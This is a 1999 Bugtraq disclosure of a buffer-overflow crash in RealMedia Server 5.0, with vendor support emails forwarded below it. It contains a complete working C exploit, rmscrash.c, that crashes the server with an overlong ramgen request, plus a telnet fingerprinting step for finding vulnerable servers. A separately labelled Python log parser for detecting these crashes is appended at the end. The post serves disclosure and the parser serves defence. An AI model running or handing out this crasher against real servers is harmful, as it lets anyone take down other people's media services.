Bugtraq mailing list archives
RealMedia Server 5.0 Crasher (rmscrash.c)
From: bow () BOW NET (bow)
Date: Wed, 22 Dec 1999 22:33:21 -0800
RealMedia 5.0 servers, and probably 4.0, can be crashed by overflowing the buffer which stores the ramgen requests. I emailed RealNetworks about it and they finally got back to me a month and a half later. Their response was that it's a known issue with 5.0 and the only way to fix it is to upgrade to 6.0. Of course upgrading means paying more money. I really wish all companies would fully back their COMMERCIAL software and make patches for previous releases. Oh well.

The exploit is included below. It's been tested on FreeBSD and RealMedia server 5.0-rvserver-build-290. When the server crashes, it logs the IP of the person who crashed it in the pnserver error log. It looks like this:

***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance...
***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 204.216.183.2
***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful
***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating...
***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Please File Bug Report

An easy way to tell if a server is running 5.0 is to telnet to the realmedia port, usually 7070, and type:

GET /SmpDsBhgRl <enter><enter>
From what I've seen, RealMedia 5.0 servers always return "Server: RealServer 1.0 Beta" in the headers, and G2 (6.0, and 7.0?) servers return "Server: RMServer 1.0".

A hacked up fix for the problem that I've used is to edit the pnserver binary and change the ramgen string to something else. This, however, will break the ramgen functionality (which I don't use). If you are going to rename the ramgen in the binary to something else, make sure it matches the string length of 6.

-bow

-- START OF RMSCRASH.C --

/*
 * rmscrash.c - bow () bow net
 *
 * Crash a RealMedia 5.0 server by sending a very long ramgen request.
 *
 * Test on:
 *   $ pnserver -v
 *   Version: 5.0-rvserver-build-290
 *   Platform: FreeBSD-2.1.x
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* memset, memcpy, strlen */
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define BUFLEN 4082

/* "GET /ramgen/" + filler up to BUFLEN + " HTTP/1.1\r\n\r\n" + terminating NUL */
char buf[BUFLEN+14];
int sock;
struct sockaddr_in sa;
struct hostent *hp;

int main (int argc, char *argv[])
{
    int port;

    if (argc < 3) {
        printf("Usage: %s realserver port\n",argv[0]);
        exit(-1);
    }
    port = atoi(argv[2]);

    /* Build the oversized ramgen request: the path is padded with 'A' bytes */
    memset(buf,0x41,BUFLEN);
    memcpy(buf,"GET /ramgen/",12);
    memcpy(buf+BUFLEN," HTTP/1.1\r\n\r\n", 13);

    if ((hp=gethostbyname(argv[1]))==NULL) {
        perror("gethostbyname()");
        exit(0);
    }
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        perror("socket()");
        exit(0);
    }
    sa.sin_family=AF_INET;
    sa.sin_port=htons(port);
    memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
    if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
        perror("connect()");
        exit(0);
    }
    printf("Connected to %s. Sending data\n",argv[1]);
    write(sock,buf,strlen(buf));
    printf("Done.\n");
    close(sock);
    return 0;
}

--- END OF RMSCRASH.C ---

----- Forwarded message from tsserver () support real com -----

From: tsserver () support real com
Date: Wed, 22 Dec 1999 10:14:57 -0800
Subject: Re: max the ramgen buffer [#7570768]
To: bow () bow net
X-MIME-Autoconverted: from quoted-printable to 8bit by bow.net id KAA03016

Hello Bow,

No, unfortunately there is not.
The solution is to upgrade to 6.0 or 7.0.

Best wishes,
Kim
~~~~~~~~~~~~~~~~~~~~
Kimberly Ayars
SDK Support Engineer

------- Original Message --------
From: bow () bow net
To: tsserver () support real com
Subject: Re: max the ramgen buffer [#7570768]
Date: 12/21/99 16:58:20

Well is there a fix for this in the 5.0 server??

-bow

On Tue, Dec 21, 1999 at 04:52:07PM -0800, tsserver () support real com wrote:

Hello Bow,

First of all, I apologize for the delay in responding. Thank you so much for your patience.

This is a known issue in the 5.0 RealServer and is fixed in the 6.0 and 7.0 RealServers.

Best wishes,
Kim
~~~~~~~~~~~~~~~~~~~~
Kimberly Ayars
SDK Support Engineer

------- Original Message --------
From: bow () bow net
To: tsserver () support real com
Subject: max the ramgen buffer
Date: 11/06/99 04:10:46

Making a request to the Real5 server with a long (~4040 bytes) request will crash the server. Is this a known issue?

***06-Nov-99 03:48:40.248 pnserver(60580): TRAPPED FAULT: Please File Bug Report
***06-Nov-99 03:48:40.248 pnserver(60580): Fault Report: 5.0-rvserver-build-290 FreeBSD-2.1.x

Do you guys have an updated Real5 server?

THE INFORMATION PROVIDED IN THE REALNETWORKS KNOWLEDGE BASE IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND. REALNETWORKS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL REALNETWORKS OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF REALNETWORKS OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY.

Copyright (c) RealNetworks Inc. and/or its licensors, 1995 - 1999 all rights reserved. RealAudio, RealVideo, RealMedia and RealPlayer are trademarks of RealNetworks Inc.
--------------------- Instructions to Reply ---------------------

Your Incident ID number for this request is 7570768

To reply to this message you may simply reply to this email. (Please do not modify the subject line)

To view all activity on this ticket go to the following URL. You will also be able to reply from there.
http://customerrelations.real.com/scripts/rnforms/loginpage.asp

To verify your identity, you will be prompted for this Incident ID number and your email address.
----- End forwarded message -----
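Added detection example, not part of bow's post or any RealNetworks code: a small Python parser for pnserver error-log lines of the shape quoted in this thread. It groups the TRAPPED FAULT / FATAL ERROR sequence per server PID, pulls out the client IP the server names, and separates faults the server survived from the ones that terminated it. The log format and the use of PID as the incident key are assumptions based only on the lines quoted above; the sample input is constructed around them.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
# One pnserver error-log line: ***DD-Mon-YY HH:MM:SS.mmm pnserver(PID): message
LINE_RE = re.compile(r"^\*{3}(?P<ts>\d{2}-[A-Za-z]{3}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}) "
                     r"pnserver\((?P<pid>\d+)\): (?P<msg>.*)$")
CLIENT_RE = re.compile(r"^Fault caused by type (?P<ctype>\d+) client from (?P<ip>\S+)")
FAULT_PREFIXES = ("TRAPPED FAULT", "FATAL ERROR", "Fault caused by")

@dataclass
class FaultIncident:
    pid: int
    first_seen: str
    client_ip: Optional[str] = None    # filled from the "Fault caused by ... client from" line
    client_type: Optional[int] = None
    fatal: bool = False                # True once crash avoidance failed and pnserver died

def parse_pnserver_log(text: str) -> List[FaultIncident]:
    # One incident per pnserver PID. Assumption: a PID that faults is not
    # reused inside the window being scanned, so it works as an incident key.
    incidents: Dict[int, FaultIncident] = {}
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m or not m["msg"].startswith(FAULT_PREFIXES):
            continue                   # unrelated or malformed line
        pid, msg = int(m["pid"]), m["msg"]
        inc = incidents.setdefault(pid, FaultIncident(pid=pid, first_seen=m["ts"]))
        if c := CLIENT_RE.match(msg):
            inc.client_ip, inc.client_type = c["ip"], int(c["ctype"])
        elif msg.startswith("FATAL ERROR: Couldn't Handle Fault"):
            inc.fatal = True
    return list(incidents.values())

def fatal_client_ips(text: str) -> List[str]:
    # Clients whose request actually took the server down: the ones worth an alert.
    return [i.client_ip for i in parse_pnserver_log(text) if i.fatal and i.client_ip]

# Constructed sample: the five lines quoted in the post (pid 241), plus a second,
# non-fatal trapped fault from a made-up client 192.0.2.10 (pid 300).
SAMPLE_LOG = """\
***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Attempting Crash Avoidance...
***22-Dec-99 10:57:16.112 pnserver(241): Fault caused by type 0 client from 204.216.183.2
***22-Dec-99 10:57:16.112 pnserver(241): TRAPPED FAULT: Crash Avoidance Successful
***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Couldn't Handle Fault: Terminating...
***22-Dec-99 10:57:16.113 pnserver(241): FATAL ERROR: Please File Bug Report
***22-Dec-99 11:05:44.001 pnserver(300): TRAPPED FAULT: Attempting Crash Avoidance...
***22-Dec-99 11:05:44.001 pnserver(300): Fault caused by type 0 client from 192.0.2.10
***22-Dec-99 11:05:44.002 pnserver(300): TRAPPED FAULT: Crash Avoidance Successful
"""
```

Feeding a real pnserver error log to fatal_client_ips() yields the addresses whose request ended in "Couldn't Handle Fault", while the full incident list still records the faults the server survived.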